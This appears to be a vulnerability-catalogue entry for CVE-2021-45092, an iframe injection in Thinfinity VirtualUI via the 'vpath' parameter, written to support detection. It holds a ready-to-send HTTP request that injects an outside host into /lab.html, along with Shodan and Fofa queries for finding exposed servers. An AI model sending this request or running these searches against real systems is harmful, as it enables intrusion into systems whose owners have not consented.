🔙 목록으로 돌아가기

CVE-2021-45092: Thinfinity Iframe Injection

TitleThinfinity Iframe Injection
Authordanielmofer
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential remote code execution.
RemediationApply the latest security patches or updates provided by the vendor to fix the vulnerability.
CVSS Score9.8
EPSS Score0.78911
CVE IDCVE-2021-45092
CWE IDCWE-74
Shodan Queryhttp.title:"thinfinity virtualui"
Fofa Querytitle="thinfinity virtualui"
Tags cve2021 cve packetstorm iframe thinfinity tenable injection cybelesoft vkev vuln

🔍 Vulnerability Description

A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the “vpath” parameter.

🌐 HTTP Request

GET /lab.html?vpath=//interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-45092.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-45092.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A